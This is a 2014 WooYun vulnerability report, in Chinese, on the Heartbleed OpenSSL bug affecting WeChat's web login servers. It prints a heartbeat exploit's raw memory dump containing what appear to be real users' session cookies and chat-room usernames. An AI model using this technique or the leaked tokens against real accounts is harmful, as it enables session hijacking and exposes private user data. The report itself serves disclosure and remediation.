当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-055941
漏洞标题:
微信网页版和公众账号版运维不当导致可随机登录微信用户并获取服务器敏感信息
相关厂商:
腾讯
漏洞作者:
猪猪侠
提交时间:
2014-04-08 16:09
修复时间:
2014-04-13 16:10
公开时间:
2014-04-13 16:10
漏洞类型:
敏感信息泄露
危害等级:
自评Rank:
20
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-04-08: 细节已通知厂商并且等待厂商处理中
2014-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

微信网页版和公众账号版运维不当导致可随机登录微信用户并获取服务器敏感信息
http://wx.qq.com
http://mp.weixin.qq.com

详细说明:

#1 漏洞描述 (CVE-2014-0160)
http://drops.wooyun.org/papers/1381
针对Openssl heartbeat漏洞的exp已经流出,经过测试可以dump出任何使用openssl库进程的内存数据,每次64kb,位置随机,但是由于exp起来十分容易速度很快并且可以多线程,一会就获得了几千个用户的cookie,随机抽取了几个发现可以任意登录。
#2 危害描述
该漏洞不但能获取cookie、源码、服务器配置,研究者声称他们能成功恢复SSL密钥

漏洞证明:

# 获取cookie

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 3554
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 65 35 32 31  ....#.......e521
  00e0: 39 32 32 32 36 34 36 37 33 33 34 34 26 73 79 6E  922264673344&syn
  00f0: 63 6B 65 79 3D 31 5F 36 32 34 33 35 30 35 35 32  ckey=1_624350552
  0100: 25 37 43 32 5F 36 32 34 33 35 31 31 31 34 25 37  %7C2_624351114%7
  0110: 43 33 5F 36 32 34 33 35 31 30 39 32 25 37 43 31  C3_624351092%7C1
  0120: 31 5F 36 32 34 33 35 30 30 32 30 25 37 43 32 30  1_624350020%7C20
  0130: 31 5F 31 33 39 36 39 34 33 36 32 32 25 37 43 31  1_1396943622%7C1
  0140: 30 30 30 5F 31 33 39 36 39 32 30 35 32 30 26 5F  000_1396920520&_
  0150: 3D 31 33 39 36 39 34 34 34 32 37 39 35 34 20 48  =1396944427954 H
  0160: 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 77  TTP/1.1..Host: w
  0170: 65 62 70 75 73 68 2E 77 65 69 78 69 6E 2E 71 71  ebpush.weixin.qq
  0180: 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E  .com..Connection
  0190: 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A 41 63  : keep-alive..Ac
  01a0: 63 65 70 74 3A 20 2A 2F 2A 0D 0A 55 73 65 72 2D  cept: */*..User-
  01b0: 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35  Agent: Mozilla/5
  01c0: 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 35  .0 (Windows NT 5
  01d0: 2E 31 29 20 41 70 70 6C 65 57 65 62 4B 69 74 2F  .1) AppleWebKit/
  01e0: 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 6C  537.36 (KHTML, l
  01f0: 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F 6D  ike Gecko) Chrom
  0200: 65 2F 32 38 2E 30 2E 31 35 30 30 2E 39 35 20 53  e/28.0.1500.95 S
  0210: 61 66 61 72 69 2F 35 33 37 2E 33 36 20 53 45 20  afari/537.36 SE
  0220: 32 2E 58 20 4D 65 74 61 53 72 20 31 2E 30 0D 0A  2.X MetaSr 1.0..
  0230: 52 65 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F  Referer: https:/
  0240: 2F 77 78 2E 71 71 2E 63 6F 6D 2F 3F 26 6C 61 6E  /wx.qq.com/?&lan
  0250: 67 3D 7A 68 5F 43 4E 0D 0A 41 63 63 65 70 74 2D  g=zh_CN..Accept-
  0260: 45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 64  Encoding: gzip,d
  0270: 65 66 6C 61 74 65 2C 73 64 63 68 0D 0A 41 63 63  eflate,sdch..Acc
  0280: 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68  ept-Language: zh
  0290: 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 0D 0A 43 6F  -CN,zh;q=0.8..Co
  02a0: 6F 6B 69 65 3A 20 61 64 69 64 3D 39 31 30 39 31  okie: adid=91091
  02b0: 31 38 35 31 3B 20 61 64 56 65 72 3D 32 38 38 31  1851; adVer=2881
  02c0: 3B 20 61 63 3D 31 2C 30 32 30 2C 3B 20 70 67 76  ; ac=1,020,; pgv
  02d0: 5F 72 5F 63 6F 6F 6B 69 65 3D 31 30 36 31 38 31  _r_cookie=106181
  02e0: 35 36 32 39 39 37 38 3B 20 70 76 69 64 3D 39 37  5629978; pvid=97
  02f0: 36 37 36 33 32 36 36 32 3B 20 41 52 45 41 43 4F  67632662; AREACO
  0300: 44 45 3D 31 7C 31 32 7C 3B 20 50 43 43 4F 4F 4B  DE=1|12|; PCCOOK
  0310: 49 45 3D 35 63 35 30 35 36 31 39 30 36 30 35 33  IE=5c50561906053
  0320: 64 65 35 36 38 61 37 35 66 37 61 33 61 37 61 62  de568a75f7a3a7ab
  0330: 36 63 38 34 34 36 32 62 65 36 35 39 61 38 65 61  6c84462be659a8ea
  0340: 64 64 34 31 30 33 62 64 61 36 62 61 36 35 35 61  dd4103bda6ba655a
  0350: 36 39 35 3B 20 50 43 43 4F 4F 4B 49 45 32 3D 33  695; PCCOOKIE2=3
  0360: 38 32 31 32 33 30 34 37 3B 20 6C 76 5F 69 72 74  82123047; lv_irt
  0370: 5F 69 64 3D 37 35 63 65 63 30 33 39 38 35 36 35  _id=75cec0398565
  0380: 65 30 37 34 36 38 63 30 31 35 66 39 31 39 38 65  e07468c015f9198e
  0390: 33 61 37 36 3B 20 6F 5F 63 6F 6F 6B 69 65 3D 39  3a76; o_cookie=9
  03a0: 31 30 39 31 31 38 35 31 3B 20 67 5F 70 76 69 64  10911851; g_pvid
  03b0: 3D 31 33 39 35 35 33 32 36 39 37 30 30 30 3B 20  =1395532697000;
  03c0: 71 6D 5F 75 73 65 72 6E 61 6D 65 3D 39 31 30 39  qm_username=9109
  03d0: 31 31 38 35 31 3B 20 71 6D 5F 73 69 64 3D 63 37  11851; qm_sid=c7
  03e0: 63 66 62 61 66 62 66 62 32 37 63 31 65 33 32 63  cfbafbfb27c1e32c
  03f0: 38 34 32 37 36 31 33 32 30 39 30 39 61 39 2C 71  842761320909a9,q
  0400: 53 30 64 4D 53 57 31 73 59 6A 52 58 62 69 70 4E  S0dMSW1sYjRXbipN
  0410: 5A 6D 68 68 4F 57 4E 7A 4D 57 74 36 59 6E 64 35  ZmhhOWNzMWt6Ynd5
  0420: 65 58 4E 69 52 58 46 76 59 54 5A 73 57 47 6C 30  eXNiRXFvYTZsWGl0
  0430: 62 6B 74 51 52 6E 52 6E 62 31 38 2E 3B 20 52 4B  bktQRnRnb18.; RK
  0440: 3D 52 37 30 6D 35 69 49 56 64 75 3B 20 70 74 69  =R70m5iIVdu; pti
  0450: 73 70 3D 63 74 63 3B 20 70 74 63 7A 3D 65 35 33  sp=ctc; ptcz=e53
  0460: 32 35 33 39 65 34 34 63 35 34 66 63 35 65 38 34  2539e44c54fc5e84
  0470: 63 38 34 36 65 31 64 38 63 65 64 31 32 62 61 61  c846e1d8ced12baa
  0480: 34 37 30 62 32 65 63 39 64 61 66 64 65 31 62 31  470b2ec9dafde1b1
  0490: 65 63 35 63 32 31 64 33 39 62 64 38 37 3B 20 70  ec5c21d39bd87; p
  04a0: 74 32 67 67 75 69 6E 3D 6F 30 39 31 30 39 31 31  t2gguin=o0910911
  04b0: 38 35 31 3B 20 70 67 76 5F 69 6E 66 6F 3D 73 73  851; pgv_info=ss
  04c0: 69 64 3D 73 32 30 32 39 36 35 30 35 35 33 3B 20  id=s2029650553;
  04d0: 74 73 5F 72 65 66 65 72 3D 77 77 77 2E 73 6F 67  ts_refer=www.sog
  04e0: 6F 75 2E 63 6F 6D 2F 73 6F 67 6F 75 3B 20 70 67  ou.com/sogou; pg
  04f0: 76 5F 70 76 69 64 3D 35 38 38 31 37 32 35 32 36  v_pvid=588172526
  0500: 3B 20 74 73 5F 75 69 64 3D 31 35 35 38 31 33 31  ; ts_uid=1558131
  0510: 36 30 3B 20 75 69 6E 3D 3B 20 73 6B 65 79 3D 3B  60; uin=; skey=;
  0520: 20 72 76 32 3D 38 30 39 41 35 33 34 41 45 41 37   rv2=809A534AEA7
  0530: 45 38 43 33 30 33 37 38 32 37 39 45 30 35 37 34  E8C30378279E0574
  0540: 30 45 44 39 38 41 39 30 44 43 39 33 42 45 44 44  0ED98A90DC93BEDD
  0550: 38 39 42 38 41 44 35 3B 20 70 72 6F 70 65 72 74  89B8AD5; propert
  0560: 79 32 30 3D 38 37 44 34 38 44 33 41 46 36 34 36  y20=87D48D3AF646
  0570: 41 35 38 30 41 41 37 30 33 35 44 36 31 34 42 43  A580AA7035D614BC
  0580: 43 46 39 39 37 41 42 44 39 30 44 45 38 33 36 44  CF997ABD90DE836D
  0590: 35 30 44 36 41 46 46 43 31 33 32 32 39 38 34 46  50D6AFFC1322984F
  05a0: 31 34 30 30 35 33 42 39 31 38 44 35 45 42 33 41  140053B918D5EB3A
  05b0: 42 46 31 32 3B 20 77 65 62 77 78 75 76 69 64 3D  BF12; webwxuvid=
  05c0: 33 32 37 35 31 39 37 38 34 30 3B 20 6D 6D 5F 6C  3275197840; mm_l
  05d0: 61 6E 67 3D 7A 68 5F 43 4E 3B 20 77 78 73 74 61  ang=zh_CN; wxsta
  05e0: 79 74 69 6D 65 3D 31 33 39 36 39 34 33 35 31 37  ytime=1396943517
  05f0: 3B 20 77 78 70 6C 75 67 69 6E 6B 65 79 3D 31 33  ; wxpluginkey=13
  0600: 39 36 39 32 30 35 32 30 3B 20 77 78 75 69 6E 3D  96920520; wxuin=
  0610: 31 34 30 39 37 31 38 31 38 31 3B 20 77 78 73 69  1409718181; wxsi
  0620: 64 3D 54 31 75 4F 46 70 6B 2F 54 52 58 36 5A 34  d=T1uOFpk/TRX6Z4
  0630: 76 75 0D 0A 0D 0A 67 7D C6 C8 EF A2 0C A3 32 C9  vu....g}......2.
  0640: CD AB 8A 95 57 71 01 2D E3 A7 05 05 05 05 05 05  ....Wq.-........
  0650: 2D 79 6F 22 2C 22 43 68 61 74 52 6F 6F 6D 49 64  -yo","ChatRoomId
  0660: 22 3A 33 33 31 39 31 30 32 38 33 37 7D 2C 7B 22  ":3319102837},{"
  0670: 55 73 65 72 4E 61 6D 65 22 3A 22 77 78 69 64 5F  UserName":"wxid_
  0680: 64 6A 6F 61 33 78 31 30 32 30 72 38 32 32 22 2C  djoa3x1020r822",
  0690: 22 43 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31  "ChatRoomId":331
  06a0: 39 31 30 32 38 33 37 7D 2C 7B 22 55 73 65 72 4E  9102837},{"UserN
  06b0: 61 6D 65 22 3A 22 77 78 69 64 5F 6D 36 68 35 67  ame":"wxid_m6h5g
  06c0: 6F 6E 39 66 79 38 34 32 31 22 2C 22 43 68 61 74  on9fy8421","Chat
  06d0: 52 6F 6F 6D 49 64 22 3A 33 33 31 39 31 30 32 38  RoomId":33191028
  06e0: 33 37 7D 2C 7B 22 55 73 65 72 4E 61 6D 65 22 3A  37},{"UserName":
  06f0: 22 73 68 69 74 6F 75 35 30 37 30 38 32 22 2C 22  "shitou507082","
  0700: 43 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 39  ChatRoomId":3319
  0710: 31 30 32 38 33 37 7D 2C 7B 22 55 73 65 72 4E 61  102837},{"UserNa
  0720: 6D 65 22 3A 22 72 75 6E 71 69 31 31 22 2C 22 43  me":"runqi11","C
  0730: 68 61 74 52 6F 6F 6D 49 64 22 3A 33 33 31 39 31  hatRoomId":33191
  0740: 30 32 38 33 37 7D 5D 7D 75 5E 87 30 86 EF B4 88  02837}]}u^.0....
  0750: C4 13 B3 66 1A F7 22 56 70 A2 4D 35 03 03 03 03  ...f.."Vp.M5....
  0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

修复方案:

# 更新openssl到最新版或降级

版权声明:转载请注明来源 猪猪侠@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-13 16:10

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

2014-04-14:感谢您的反馈,该问题属于通用型漏洞,已有白帽子通过其它途径先于您报告,并已知会相关业务修复。再次感谢您的支持,如有疑问,欢迎反馈,我们将有专人跟进